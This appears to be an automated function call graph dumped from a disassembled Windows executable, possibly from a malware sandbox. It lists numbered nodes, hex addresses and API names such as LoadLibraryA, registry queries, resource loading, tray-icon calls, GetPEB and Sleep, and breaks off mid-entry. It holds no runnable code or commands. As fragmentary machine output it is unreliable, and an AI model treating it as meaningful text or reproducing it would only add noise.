95651->95809 95654 d72f12 95652->95654 95762 d7a81b 41 API calls 95654->95762 95655 db2d1e 95657 d73a5a 24 API calls 95655->95657 95658 db2d44 95657->95658 95810 d73084 22 API calls 95658->95810 95659 d72f21 95662 d7a961 22 API calls 95659->95662 95661 db2d50 95663 d7a8c7 22 API calls 95661->95663 95664 d72f3f 95662->95664 95666 db2d5e 95663->95666 95763 d73084 22 API calls 95664->95763 95811 d73084 22 API calls 95666->95811 95667 d72f4b 95764 d94a28 40 API calls 3 library calls 95667->95764 95670 db2d6d 95673 d7a8c7 22 API calls 95670->95673 95671 d72f59 95671->95646 95672 d72f63 95671->95672 95765 d94a28 40 API calls 3 library calls 95672->95765 95675 db2d83 95673->95675 95812 d73084 22 API calls 95675->95812 95676 d72f6e 95676->95651 95678 d72f78 95676->95678 95766 d94a28 40 API calls 3 library calls 95678->95766 95679 db2d90 95681 d72f83 95681->95655 95682 d72f8d 95681->95682 95767 d94a28 40 API calls 3 library calls 95682->95767 95684 d72f98 95685 d72fdc 95684->95685 95768 d73084 22 API calls 95684->95768 95685->95670 95686 d72fe8 95685->95686 95686->95679 95770 d763eb 22 API calls 95686->95770 95688 d72fbf 95690 d7a8c7 22 API calls 95688->95690 95692 d72fcd 95690->95692 95691 d72ff8 95771 d76a50 22 API calls 95691->95771 95769 d73084 22 API calls 95692->95769 95695 d73006 95772 d770b0 23 API calls 95695->95772 95699 d73021 95700 d73065 95699->95700 95773 d76f88 22 API calls 95699->95773 95774 d770b0 23 API calls 95699->95774 95775 d73084 22 API calls 95699->95775 95813 d8fe0b 95702->95813 95704 d7a976 95823 d8fddb 95704->95823 95706 d72e4d 95707 d74ae3 95706->95707 95708 d74af0 __wsopen_s 95707->95708 95710 d74b22 95708->95710 95851 d76b57 95708->95851 95717 d74b58 95710->95717 95848 d74c6d 95710->95848 95712 d79cb3 22 API calls 95714 d74c52 95712->95714 95713 d79cb3 22 API calls 95713->95717 95715 d7515f 22 API calls 95714->95715 95719 d74c5e 95715->95719 95716 d74c6d 22 API calls 95716->95717 95717->95713 95717->95716 95720 d74c29 95717->95720 95863 d7515f 95717->95863 95719->95627 95720->95712 95720->95719 95880 db1f50 95721->95880 95724 d79cb3 22 API calls 95725 d73a8d 95724->95725 95882 d73aa2 95725->95882 95727 d73a97 95727->95629 95729 d79cc2 _wcslen 95728->95729 95730 d8fe0b 22 API calls 95729->95730 95731 d79cea __fread_nolock 95730->95731 95732 d8fddb 22 API calls 95731->95732 95733 d72e8c 95732->95733 95734 d74ecb 95733->95734 95902 d74e90 LoadLibraryA 95734->95902 95739 d74ef6 LoadLibraryExW 95910 d74e59 LoadLibraryA 95739->95910 95740 db3ccf 95742 d74f39 68 API calls 95740->95742 95744 db3cd6 95742->95744 95746 d74e59 3 API calls 95744->95746 95748 db3cde 95746->95748 95747 d74f20 95747->95748 95749 d74f2c 95747->95749 95932 d750f5 95748->95932 95750 d74f39 68 API calls 95749->95750 95752 d72ea5 95750->95752 95752->95634 95752->95635 95755 db3d05 95757 d7a8ea __fread_nolock 95756->95757 95758 d7a8db 95756->95758 95757->95641 95758->95757 95759 d8fe0b 22 API calls 95758->95759 95759->95757 95760->95644 95761->95649 95762->95659 95763->95667 95764->95671 95765->95676 95766->95681 95767->95684 95768->95688 95769->95685 95770->95691 95771->95695 95772->95699 95773->95699 95774->95699 95775->95699 95777 de2d15 95776->95777 95778 d7511f 64 API calls 95777->95778 95779 de2d29 95778->95779 96083 de2e66 95779->96083 95782 d750f5 40 API calls 95783 de2d56 95782->95783 95784 d750f5 40 API calls 95783->95784 95785 de2d66 95784->95785 95786 d750f5 40 API calls 95785->95786 95787 de2d81 95786->95787 95788 d750f5 40 API calls 95787->95788 95789 de2d9c 95788->95789 95790 d7511f 64 API calls 95789->95790 95791 de2db3 95790->95791 95792 d9ea0c ___std_exception_copy 21 API calls 95791->95792 95793 de2dba 95792->95793 95794 d9ea0c ___std_exception_copy 21 API calls 95793->95794 95795 de2dc4 95794->95795 95796 d750f5 40 API calls 95795->95796 95797 de2dd8 95796->95797 95798 de28fe 27 API calls 95797->95798 95800 de2dee 95798->95800 95799 de2d3f 95799->95637 95800->95799 96089 de22ce 95800->96089 95803 d74f43 95802->95803 95805 d74f4a 95802->95805 95804 d9e678 67 API calls 95803->95804 95804->95805 95806 d74f6a FreeLibrary 95805->95806 95807 d74f59 95805->95807 95806->95807 95807->95638 95808->95651 95809->95655 95810->95661 95811->95670 95812->95679 95815 d8fddb 95813->95815 95816 d8fdfa 95815->95816 95819 d8fdfc 95815->95819 95833 d9ea0c 95815->95833 95840 d94ead 7 API calls 2 library calls 95815->95840 95816->95704 95818 d9066d 95842 d932a4 RaiseException 95818->95842 95819->95818 95841 d932a4 RaiseException 95819->95841 95821 d9068a 95821->95704 95826 d8fde0 95823->95826 95824 d9ea0c ___std_exception_copy 21 API calls 95824->95826 95825 d8fdfa 95825->95706 95826->95824 95826->95825 95829 d8fdfc 95826->95829 95845 d94ead 7 API calls 2 library calls 95826->95845 95828 d9066d 95847 d932a4 RaiseException 95828->95847 95829->95828 95846 d932a4 RaiseException 95829->95846 95831 d9068a 95831->95706 95839 da3820 _abort 95833->95839 95834 da385e 95844 d9f2d9 20 API calls _abort 95834->95844 95835 da3849 RtlAllocateHeap 95837 da385c 95835->95837 95835->95839 95837->95815 95839->95834 95839->95835 95843 d94ead 7 API calls 2 library calls 95839->95843 95840->95815 95841->95818 95842->95821 95843->95839 95844->95837 95845->95826 95846->95828 95847->95831 95869 d7aec9 95848->95869 95850 d74c78 95850->95710 95852 d76b67 _wcslen 95851->95852 95853 db4ba1 95851->95853 95856 d76ba2 95852->95856 95857 d76b7d 95852->95857 95876 d793b2 95853->95876 95855 db4baa 95855->95855 95859 d8fddb 22 API calls 95856->95859 95875 d76f34 22 API calls 95857->95875 95861 d76bae 95859->95861 95860 d76b85 __fread_nolock 95860->95710 95862 d8fe0b 22 API calls 95861->95862 95862->95860 95864 d7516e 95863->95864 95868 d7518f __fread_nolock 95863->95868 95867 d8fe0b 22 API calls 95864->95867 95865 d8fddb 22 API calls 95866 d751a2 95865->95866 95866->95717 95867->95868 95868->95865 95870 d7aedc 95869->95870 95874 d7aed9 __fread_nolock 95869->95874 95871 d8fddb 22 API calls 95870->95871 95872 d7aee7 95871->95872 95873 d8fe0b 22 API calls 95872->95873 95873->95874 95874->95850 95875->95860 95877 d793c9 __fread_nolock 95876->95877 95878 d793c0 95876->95878 95877->95855 95878->95877 95879 d7aec9 22 API calls 95878->95879 95879->95877 95881 d73a67 GetModuleFileNameW 95880->95881 95881->95724 95883 db1f50 __wsopen_s 95882->95883 95884 d73aaf GetFullPathNameW 95883->95884 95885 d73ace 95884->95885 95886 d73ae9 95884->95886 95888 d76b57 22 API calls 95885->95888 95896 d7a6c3 95886->95896 95889 d73ada 95888->95889 95892 d737a0 95889->95892 95893 d737ae 95892->95893 95894 d793b2 22 API calls 95893->95894 95895 d737c2 95894->95895 95895->95727 95897 d7a6d0 95896->95897 95898 d7a6dd 95896->95898 95897->95889 95899 d8fddb 22 API calls 95898->95899 95900 d7a6e7 95899->95900 95901 d8fe0b 22 API calls 95900->95901 95901->95897 95903 d74ec6 95902->95903 95904 d74ea8 GetProcAddress 95902->95904 95907 d9e5eb 95903->95907 95905 d74eb8 95904->95905 95905->95903 95906 d74ebf FreeLibrary 95905->95906 95906->95903 95940 d9e52a 95907->95940 95909 d74eea 95909->95739 95909->95740 95911 d74e6e GetProcAddress 95910->95911 95912 d74e8d 95910->95912 95913 d74e7e 95911->95913 95915 d74f80 95912->95915 95913->95912 95914 d74e86 FreeLibrary 95913->95914 95914->95912 95916 d8fe0b 22 API calls 95915->95916 95917 d74f95 95916->95917 95993 d75722 95917->95993 95919 d74fa1 __fread_nolock 95920 d750a5 95919->95920 95921 db3d1d 95919->95921 95931 d74fdc 95919->95931 95996 d742a2 CreateStreamOnHGlobal 95920->95996 96007 de304d 74 API calls 95921->96007 95924 db3d22 95926 d7511f 64 API calls 95924->95926 95925 d750f5 40 API calls 95925->95931 95927 db3d45 95926->95927 95928 d750f5 40 API calls 95927->95928 95929 d7506e ISource 95928->95929 95929->95747 95931->95924 95931->95925 95931->95929 96002 d7511f 95931->96002 95933 d75107 95932->95933 95934 db3d70 95932->95934 96029 d9e8c4 95933->96029 95937 de28fe 96066 de274e 95937->96066 95939 de2919 95939->95755 95943 d9e536 ___BuildCatchObject 95940->95943 95941 d9e544 95965 d9f2d9 20 API calls _abort 95941->95965 95943->95941 95945 d9e574 95943->95945 95944 d9e549 95966 da27ec 26 API calls _abort 95944->95966 95947 d9e579 95945->95947 95948 d9e586 95945->95948 95967 d9f2d9 20 API calls _abort 95947->95967 95957 da8061 95948->95957 95951 d9e58f 95952 d9e5a2 95951->95952 95953 d9e595 95951->95953 95969 d9e5d4 RtlLeaveCriticalSection __fread_nolock 95952->95969 95968 d9f2d9 20 API calls _abort 95953->95968 95955 d9e554 __fread_nolock 95955->95909 95958 da806d ___BuildCatchObject 95957->95958 95970 da2f5e RtlEnterCriticalSection 95958->95970 95960 da807b 95971 da80fb 95960->95971 95964 da80ac __fread_nolock 95964->95951 95965->95944 95966->95955 95967->95955 95968->95955 95969->95955 95970->95960 95978 da811e 95971->95978 95972 da8088 95984 da80b7 95972->95984 95973 da8177 95989 da4c7d 20 API calls 2 library calls 95973->95989 95975 da8180 95977 da29c8 _free 20 API calls 95975->95977 95979 da8189 95977->95979 95978->95972 95978->95973 95987 d9918d RtlEnterCriticalSection 95978->95987 95988 d991a1 RtlLeaveCriticalSection 95978->95988 95979->95972 95990 da3405 11 API calls 2 library calls 95979->95990 95982 da81a8 95991 d9918d RtlEnterCriticalSection 95982->95991 95992 da2fa6 RtlLeaveCriticalSection 95984->95992 95986 da80be 95986->95964 95987->95978 95988->95978 95989->95975 95990->95982 95991->95972 95992->95986 95994 d8fddb 22 API calls 95993->95994 95995 d75734 95994->95995 95995->95919 95997 d742bc FindResourceExW 95996->95997 96001 d742d9 95996->96001 95998 db35ba LoadResource 95997->95998 95997->96001 95999 db35cf SizeofResource 95998->95999 95998->96001 96000 db35e3 LockResource 95999->96000 95999->96001 96000->96001 96001->95931 96003 d7512e 96002->96003 96004 db3d90 96002->96004 96008 d9ece3 96003->96008 96007->95924 96011 d9eaaa 96008->96011 96010 d7513c 96010->95931 96014 d9eab6 ___BuildCatchObject 96011->96014 96012 d9eac2 96024 d9f2d9 20 API calls _abort 96012->96024 96013 d9eae8 96026 d9918d RtlEnterCriticalSection 96013->96026 96014->96012 96014->96013 96016 d9eac7 96025 da27ec 26 API calls _abort 96016->96025 96019 d9eaf4 96027 d9ec0a 62 API calls 2 library calls 96019->96027 96021 d9eb08 96028 d9eb27 RtlLeaveCriticalSection __fread_nolock 96021->96028 96023 d9ead2 __fread_nolock 96023->96010 96024->96016 96025->96023 96026->96019 96027->96021 96028->96023 96032 d9e8e1 96029->96032 96031 d75118 96031->95937 96033 d9e8ed ___BuildCatchObject 96032->96033 96034 d9e925 __fread_nolock 96033->96034 96035 d9e92d 96033->96035 96036 d9e900 ___scrt_fastfail 96033->96036 96034->96031 96045 d9918d RtlEnterCriticalSection 96035->96045 96059 d9f2d9 20 API calls _abort 96036->96059 96039 d9e937 96046 d9e6f8 96039->96046 96040 d9e91a 96060 da27ec 26 API calls _abort 96040->96060 96045->96039 96049 d9e70a ___scrt_fastfail 96046->96049 96053 d9e727 96046->96053 96047 d9e717 96062 d9f2d9 20 API calls _abort 96047->96062 96049->96047 96051 d9e76a __fread_nolock 96049->96051 96049->96053 96052 d9e886 ___scrt_fastfail 96051->96052 96051->96053 96056 d9d955 __fread_nolock 26 API calls 96051->96056 96058 da8d45 __fread_nolock 38 API calls 96051->96058 96064 d9cf78 26 API calls 4 library calls 96051->96064 96065 d9f2d9 20 API calls _abort 96052->96065 96061 d9e96c RtlLeaveCriticalSection __fread_nolock 96053->96061 96056->96051 96057 d9e71c 96063 da27ec 26 API calls _abort 96057->96063 96058->96051 96059->96040 96060->96034 96061->96034 96062->96057 96063->96053 96064->96051 96065->96057 96069 d9e4e8 96066->96069 96068 de275d 96068->95939 96072 d9e469 96069->96072 96071 d9e505 96071->96068 96073 d9e478 96072->96073 96074 d9e48c 96072->96074 96080 d9f2d9 20 API calls _abort 96073->96080 96078 d9e488 __alldvrm 96074->96078 96082 da333f 11 API calls 2 library calls 96074->96082 96077 d9e47d 96081 da27ec 26 API calls _abort 96077->96081 96078->96071 96080->96077 96081->96078 96082->96078 96084 de2e7a 96083->96084 96085 d750f5 40 API calls 96084->96085 96086 de2d3b 96084->96086 96087 de28fe 27 API calls 96084->96087 96088 d7511f 64 API calls 96084->96088 96085->96084 96086->95782 96086->95799 96087->96084 96088->96084 96090 de22e7 96089->96090 96091 de22d9 96089->96091 96093 de232c 96090->96093 96094 d9e5eb 29 API calls 96090->96094 96105 de22f0 96090->96105 96092 d9e5eb 29 API calls 96091->96092 96092->96090 96118 de2557 96093->96118 96096 de2311 96094->96096 96096->96093 96098 de231a 96096->96098 96097 de2370 96099 de2374 96097->96099 96100 de2395 96097->96100 96102 d9e678 67 API calls 96098->96102 96098->96105 96101 de2381 96099->96101 96104 d9e678 67 API calls 96099->96104 96122 de2171 96100->96122 96101->96105 96107 d9e678 67 API calls 96101->96107 96102->96105 96104->96101 96105->95799 96106 de239d 96108 de23c3 96106->96108 96109 de23a3 96106->96109 96107->96105 96129 de23f3 96108->96129 96111 de23b0 96109->96111 96112 d9e678 67 API calls 96109->96112 96111->96105 96113 d9e678 67 API calls 96111->96113 96112->96111 96113->96105 96114 de23de 96114->96105 96117 d9e678 67 API calls 96114->96117 96115 de23ca 96115->96114 96137 d9e678 96115->96137 96117->96105 96119 de257c 96118->96119 96121 de2565 __fread_nolock 96118->96121 96120 d9e8c4 __fread_nolock 40 API calls 96119->96120 96120->96121 96121->96097 96123 d9ea0c ___std_exception_copy 21 API calls 96122->96123 96124 de217f 96123->96124 96125 d9ea0c ___std_exception_copy 21 API calls 96124->96125 96126 de2190 96125->96126 96127 d9ea0c ___std_exception_copy 21 API calls 96126->96127 96128 de219c 96127->96128 96128->96106 96134 de2408 96129->96134 96130 de24c0 96154 de2724 96130->96154 96131 de21cc 40 API calls 96131->96134 96133 de24c7 96133->96115 96134->96130 96134->96131 96134->96133 96150 de2606 96134->96150 96158 de2269 40 API calls 96134->96158 96138 d9e684 ___BuildCatchObject 96137->96138 96139 d9e6aa 96138->96139 96140 d9e695 96138->96140 96149 d9e6a5 __fread_nolock 96139->96149 96215 d9918d RtlEnterCriticalSection 96139->96215 96232 d9f2d9 20 API calls _abort 96140->96232 96142 d9e69a 96233 da27ec 26 API calls _abort 96142->96233 96145 d9e6c6 96216 d9e602 96145->96216 96147 d9e6d1 96234 d9e6ee RtlLeaveCriticalSection __fread_nolock 96147->96234 96149->96114 96151 de2617 96150->96151 96153 de261d 96150->96153 96151->96153 96159 de26d7 96151->96159 96153->96134 96153->96153 96155 de2742 96154->96155 96156 de2731 96154->96156 96155->96133 96157 d9dbb3 65 API calls 96156->96157 96157->96155 96158->96134 96160 de2714 96159->96160 96161 de2703 96159->96161 96160->96151 96163 d9dbb3 96161->96163 96164 d9dbc1 96163->96164 96165 d9dbdd 96163->96165 96164->96165 96166 d9dbcd 96164->96166 96167 d9dbe3 96164->96167 96165->96160 96175 d9f2d9 20 API calls _abort 96166->96175 96172 d9d9cc 96167->96172 96170 d9dbd2 96176 da27ec 26 API calls _abort 96170->96176 96177 d9d97b 96172->96177 96175->96170 96176->96165 96178 d9d987 ___BuildCatchObject 96177->96178 96185 d9918d RtlEnterCriticalSection 96178->96185 96180 d9d995 96186 d9d9f4 96180->96186 96185->96180 96194 da49a1 96186->96194 96195 d9d955 __fread_nolock 26 API calls 96194->96195 96196 da49b0 96195->96196 96197 daf89b __fread_nolock 26 API calls 96196->96197 96198 da49b6 96197->96198 96215->96145 96217 d9e60f 96216->96217 96218 d9e624 96216->96218 96260 d9f2d9 20 API calls _abort 96217->96260 96224 d9e61f 96218->96224 96235 d9dc0b 96218->96235 96220 d9e614 96261 da27ec 26 API calls _abort 96220->96261 96224->96147 96227 d9d955 __fread_nolock 26 API calls 96228 d9e646 96227->96228 96245 da862f 96228->96245 96232->96142 96233->96149 96234->96149 96236 d9dc23 96235->96236 96240 d9dc1f 96235->96240 96237 d9d955 __fread_nolock 26 API calls 96236->96237 96236->96240 96238 d9dc43 96237->96238 96262 da59be 96238->96262 96241 da4d7a 96240->96241 96242 da4d90 96241->96242 96244 d9e640 96241->96244 96243 da29c8 _free 20 API calls 96242->96243 96242->96244 96243->96244 96244->96227 96246 da863e 96245->96246 96247 da8653 96245->96247 96260->96220 96261->96224 96263 da59ca ___BuildCatchObject 96262->96263 96264 da59d2 96263->96264 96269 da59ea 96263->96269 96341 d9f2c6 20 API calls _abort 96264->96341 96266 da5a88 96269->96266 96271 da5a1f 96269->96271 96439 dcd8dd GetTempPathW 96440 dcd8fa 96439->96440 96441 d71056 96446 d7344d 96441->96446 96443 d7106a 96477 d900a3 29 API calls __onexit 96443->96477 96445 d71074 96447 d7345d __wsopen_s 96446->96447 96448 d7a961 22 API calls 96447->96448 96449 d73513 96448->96449 96450 d73a5a 24 API calls 96449->96450 96451 d7351c 96450->96451 96478 d73357 96451->96478 96456 d7515f 22 API calls 96457 d73544 96456->96457 96458 d7a961 22 API calls 96457->96458 96459 d7354d 96458->96459 96460 d7a6c3 22 API calls 96459->96460 96461 d73556 RegOpenKeyExW 96460->96461 96462 db3176 RegQueryValueExW 96461->96462 96466 d73578 96461->96466 96463 db320c RegCloseKey 96462->96463 96464 db3193 96462->96464 96463->96466 96476 db321e _wcslen 96463->96476 96465 d8fe0b 22 API calls 96464->96465 96467 db31ac 96465->96467 96466->96443 96469 d75722 22 API calls 96467->96469 96468 d74c6d 22 API calls 96468->96476 96470 db31b7 RegQueryValueExW 96469->96470 96471 db31d4 96470->96471 96473 db31ee ISource 96470->96473 96472 d76b57 22 API calls 96471->96472 96472->96473 96473->96463 96474 d79cb3 22 API calls 96474->96476 96475 d7515f 22 API calls 96475->96476 96476->96466 96476->96468 96476->96474 96476->96475 96477->96445 96479 db1f50 __wsopen_s 96478->96479 96480 d73364 GetFullPathNameW 96479->96480 96481 d73386 96480->96481 96482 d76b57 22 API calls 96481->96482 96483 d733a4 96482->96483 96484 d733c6 96483->96484 96485 db30bb 96484->96485 96486 d733dd 96484->96486 96487 d8fddb 22 API calls 96485->96487 96493 d733ee 96486->96493 96489 db30c5 _wcslen 96487->96489 96491 d8fe0b 22 API calls 96489->96491 96490 d733e8 96490->96456 96492 db30fe __fread_nolock 96491->96492 96494 d733fe _wcslen 96493->96494 96495 db311d 96494->96495 96496 d73411 96494->96496 96498 d8fddb 22 API calls 96495->96498 96503 d7a587 96496->96503 96500 db3127 96498->96500 96499 d7341e __fread_nolock 96499->96490 96501 d8fe0b 22 API calls 96500->96501 96502 db3157 __fread_nolock 96501->96502 96504 d7a59d 96503->96504 96507 d7a598 __fread_nolock 96503->96507 96505 dbf80f 96504->96505 96506 d8fe0b 22 API calls 96504->96506 96506->96507 96507->96499 96508 d73156 96511 d73170 96508->96511 96512 d73187 96511->96512 96513 d731e9 96512->96513 96514 d7318c 96512->96514 96515 d731eb 96512->96515 96516 d731d0 NtdllDefWindowProc_W 96513->96516 96519 d73265 PostQuitMessage 96514->96519 96520 d73199 96514->96520 96517 db2dfb 96515->96517 96518 d731f1 96515->96518 96523 d7316a 96516->96523 96567 d718e2 10 API calls 96517->96567 96524 d7321d SetTimer RegisterClipboardFormatW 96518->96524 96525 d731f8 96518->96525 96519->96523 96521 d731a4 96520->96521 96522 db2e7c 96520->96522 96528 db2e68 96521->96528 96529 d731ae 96521->96529 96581 ddbf30 34 API calls ___scrt_fastfail 96522->96581 96524->96523 96530 d73246 CreatePopupMenu 96524->96530 96532 d73201 KillTimer 96525->96532 96533 db2d9c 96525->96533 96527 db2e1c 96568 d8e499 42 API calls 96527->96568 96556 ddc161 96528->96556 96535 db2e4d 96529->96535 96536 d731b9 96529->96536 96530->96523 96563 d730f2 Shell_NotifyIconW ___scrt_fastfail 96532->96563 96538 db2da1 96533->96538 96539 db2dd7 MoveWindow 96533->96539 96535->96516 96580 dd0ad7 22 API calls 96535->96580 96542 d731c4 96536->96542 96543 d73253 96536->96543 96537 db2e8e 96537->96516 96537->96523 96544 db2da7 96538->96544 96545 db2dc6 SetFocus 96538->96545 96539->96523 96542->96516 96569 d730f2 Shell_NotifyIconW ___scrt_fastfail 96542->96569 96565 d7326f 44 API calls ___scrt_fastfail 96543->96565 96544->96542 96548 db2db0 96544->96548 96545->96523 96546 d73214 96564 d73c50 DeleteObject DestroyWindow 96546->96564 96566 d718e2 10 API calls 96548->96566 96551 d73263 96551->96523 96554 db2e41 96570 d73837 96554->96570 96557 ddc179 ___scrt_fastfail 96556->96557 96558 ddc276 96556->96558 96582 d73923 96557->96582 96558->96523 96560 ddc25f KillTimer SetTimer 96560->96558 96561 ddc1a0 96561->96560 96562 ddc251 Shell_NotifyIconW 96561->96562 96562->96560 96563->96546 96564->96523 96565->96551 96566->96523 96567->96527 96568->96542 96569->96554 96571 d73862 ___scrt_fastfail 96570->96571 96629 d74212 96571->96629 96574 d738e8 96576 d73906 Shell_NotifyIconW 96574->96576 96577 db3386 Shell_NotifyIconW 96574->96577 96578 d73923 24 API calls 96576->96578 96579 d7391c 96578->96579 96579->96513 96580->96513 96581->96537 96583 d7393f 96582->96583 96601 d73a13 96582->96601 96604 d76270 96583->96604 96586 db3393 LoadStringW 96589 db33ad 96586->96589 96587 d7395a 96588 d76b57 22 API calls 96587->96588 96590 d7396f 96588->96590 96593 d7a8c7 22 API calls 96589->96593 96598 d73994 ___scrt_fastfail 96589->96598 96591 db33c9 96590->96591 96592 d7397c 96590->96592 96595 d76350 22 API calls 96591->96595 96592->96589 96594 d73986 96592->96594 96593->96598 96609 d76350 96594->96609 96597 db33d7 96595->96597 96597->96598 96599 d733c6 22 API calls 96597->96599 96600 d739f9 Shell_NotifyIconW 96598->96600 96602 db33f9 96599->96602 96600->96601 96601->96561 96603 d733c6 22 API calls 96602->96603 96603->96598 96605 d8fe0b 22 API calls 96604->96605 96606 d76295 96605->96606 96607 d8fddb 22 API calls 96606->96607 96608 d7394d 96607->96608 96608->96586 96608->96587 96610 d76362 96609->96610 96611 db4a51 96609->96611 96618 d76373 96610->96618 96628 d74a88 22 API calls __fread_nolock 96611->96628 96614 d7636e 96614->96598 96615 db4a5b 96616 db4a67 96615->96616 96617 d7a8c7 22 API calls 96615->96617 96617->96616 96619 d76382 96618->96619 96625 d763b6 __fread_nolock 96618->96625 96620 db4a82 96619->96620 96621 d763a9 96619->96621 96619->96625 96623 d8fddb 22 API calls 96620->96623 96622 d7a587 22 API calls 96621->96622 96622->96625 96624 db4a91 96623->96624 96626 d8fe0b 22 API calls 96624->96626 96625->96614 96627 db4ac5 __fread_nolock 96626->96627 96628->96615 96630 d738b7 96629->96630 96631 db35a4 96629->96631 96630->96574 96633 ddc874 42 API calls _strftime 96630->96633 96631->96630 96632 db35ad DestroyCursor 96631->96632 96632->96630 96633->96574 96634 d903fb 96635 d90407 ___BuildCatchObject 96634->96635 96665 d8feb1 96635->96665 96637 d9040e 96638 d90561 96637->96638 96641 d90438 96637->96641 96692 d9083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96638->96692 96640 d90568 96693 d94e52 28 API calls _abort 96640->96693 96654 d90477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96641->96654 96676 da247d 96641->96676 96643 d9056e 96694 d94e04 28 API calls _abort 96643->96694 96647 d90576 96695 d90aea GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 96647->96695 96648 d90457 96651 d9057c __scrt_common_main_seh 96652 d904d8 96684 d90959 96652->96684 96654->96652 96688 d94e1a 38 API calls 2 library calls 96654->96688 96656 d904de 96657 d904f3 96656->96657 96689 d90992 GetModuleHandleW 96657->96689 96659 d904fa 96659->96640 96660 d904fe 96659->96660 96661 d90507 96660->96661 96690 d94df5 28 API calls _abort 96660->96690 96691 d90040 13 API calls 2 library calls 96661->96691 96664 d9050f 96664->96648 96666 d8feba 96665->96666 96696 d90698 IsProcessorFeaturePresent 96666->96696 96668 d8fec6 96697 d92c94 10 API calls 3 library calls 96668->96697 96670 d8fecb 96671 d8fecf 96670->96671 96698 da2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96670->96698 96671->96637 96673 d8fed8 96674 d8fee6 96673->96674 96699 d92cbd 8 API calls 3 library calls 96673->96699 96674->96637 96677 da2494 96676->96677 96678 d90a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96677->96678 96679 d90451 96678->96679 96679->96648 96680 da2421 96679->96680 96682 da2450 96680->96682 96681 d90a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96683 da2479 96681->96683 96682->96681 96683->96654 96700 d92340 96684->96700 96687 d9097f 96687->96656 96688->96652 96689->96659 96690->96661 96691->96664 96692->96640 96693->96643 96694->96647 96695->96651 96696->96668 96697->96670 96698->96673 96699->96671 96701 d9096c GetStartupInfoW 96700->96701 96701->96687 96702 d7fe73 96709 d8ceb1 96702->96709 96704 d7fe89 96718 d8cf92 96704->96718 96706 d7feb3 96730 de359c 82 API calls __wsopen_s 96706->96730 96708 dc4ab8 96710 d8cebf 96709->96710 96711 d8ced2 96709->96711 96731 d7aceb 23 API calls ISource 96710->96731 96713 d8cf05 96711->96713 96714 d8ced7 96711->96714 96732 d7aceb 23 API calls ISource 96713->96732 96716 d8fddb 22 API calls 96714->96716 96717 d8cec9 96716->96717 96717->96704 96719 d76270 22 API calls 96718->96719 96720 d8cfc9 96719->96720 96721 d8cffa 96720->96721 96722 d79cb3 22 API calls 96720->96722 96721->96706 96723 dcd166 96722->96723 96724 d76350 22 API calls 96723->96724 96725 dcd171 96724->96725 96733 d8d2f0 40 API calls 96725->96733 96727 dcd184 96729 dcd188 96727->96729 96734 d7aceb 23 API calls ISource 96727->96734 96729->96729 96730->96708 96731->96717 96732->96717 96733->96727 96734->96729 96735 d71033 96740 d74c91 96735->96740 96739 d71042 96741 d7a961 22 API calls 96740->96741 96742 d74cff 96741->96742 96748 d73af0 96742->96748 96745 d74d9c 96746 d71038 96745->96746 96751 d751f7 22 API calls __fread_nolock 96745->96751 96747 d900a3 29 API calls __onexit 96746->96747 96747->96739 96752 d73b1c 96748->96752 96751->96745 96753 d73b0f 96752->96753 96754 d73b29 96752->96754 96753->96745 96754->96753 96755 d73b30 RegOpenKeyExW 96754->96755 96755->96753 96756 d73b4a RegQueryValueExW 96755->96756 96757 d73b80 RegCloseKey 96756->96757 96758 d73b6b 96756->96758 96757->96753 96758->96757 96759 1043620 96773 1041270 96759->96773 96761 10436b7 96776 1043510 96761->96776 96779 10446e0 GetPEB 96773->96779 96775 10418fb 96775->96761 96777 1043519 Sleep 96776->96777 96778 1043527 96777->96778 96780 104470a 96779->96780 96780->96775 96781 d7f7bf 96782 d7fcb6 96781->96782 96783 d7f7d3 96781->96783 96877 d7aceb 23 API calls ISource 96782->96877 96784 d7fcc2 96783->96784 96786 d8fddb 22 API calls 96783->96786 96878 d7aceb 23 API calls ISource 96784->96878 96788 d7f7e5 96786->96788 96788->96784 96789 d7f83e 96788->96789 96790 d7fd3d 96788->96790 96807 d7ed9d ISource 96789->96807 96816 d81310 96789->96816 96879 de1155 22 API calls 96790->96879 96793 d8fddb 22 API calls 96813 d7ec76 ISource 96793->96813 96794 d7fef7 96802 d7a8c7 22 API calls 96794->96802 96794->96807 96797 dc4b0b 96881 de359c 82 API calls __wsopen_s 96797->96881 96798 d7a8c7 22 API calls 96798->96813 96799 dc4600 96803 d7a8c7 22 API calls 96799->96803 96799->96807 96802->96807 96803->96807 96805 d7fbe3 96805->96807 96808 dc4bdc 96805->96808 96815 d7f3ae ISource 96805->96815 96806 d7a961 22 API calls 96806->96813 96882 de359c 82 API calls __wsopen_s 96808->96882 96810 d900a3 29 API calls pre_c_initialization 96810->96813 96811 d90242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 96811->96813 96812 dc4beb 96883 de359c 82 API calls __wsopen_s 96812->96883 96813->96793 96813->96794 96813->96797 96813->96798 96813->96799 96813->96805 96813->96806 96813->96807 96813->96810 96813->96811 96813->96812 96814 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96813->96814 96813->96815 96875 d801e0 256 API calls 2 library calls 96813->96875 96876 d806a0 41 API calls ISource 96813->96876 96814->96813 96815->96807 96880 de359c 82 API calls __wsopen_s 96815->96880 96817 d817b0 96816->96817 96818 d81376 96816->96818 97131 d90242 5 API calls __Init_thread_wait 96817->97131 96819 d81390 96818->96819 96820 dc6331 96818->96820 96884 d81940 96819->96884 96823 dc633d 96820->96823 97136 df709c 256 API calls 96820->97136 96823->96813 96825 d817ba 96827 d817fb 96825->96827 96829 d79cb3 22 API calls 96825->96829 96831 dc6346 96827->96831 96833 d8182c 96827->96833 96828 d81940 9 API calls 96830 d813b6 96828->96830 96836 d817d4 96829->96836 96830->96827 96832 d813ec 96830->96832 97137 de359c 82 API calls __wsopen_s 96831->97137 96832->96831 96856 d81408 __fread_nolock 96832->96856 97133 d7aceb 23 API calls ISource 96833->97133 97132 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 96836->97132 96837 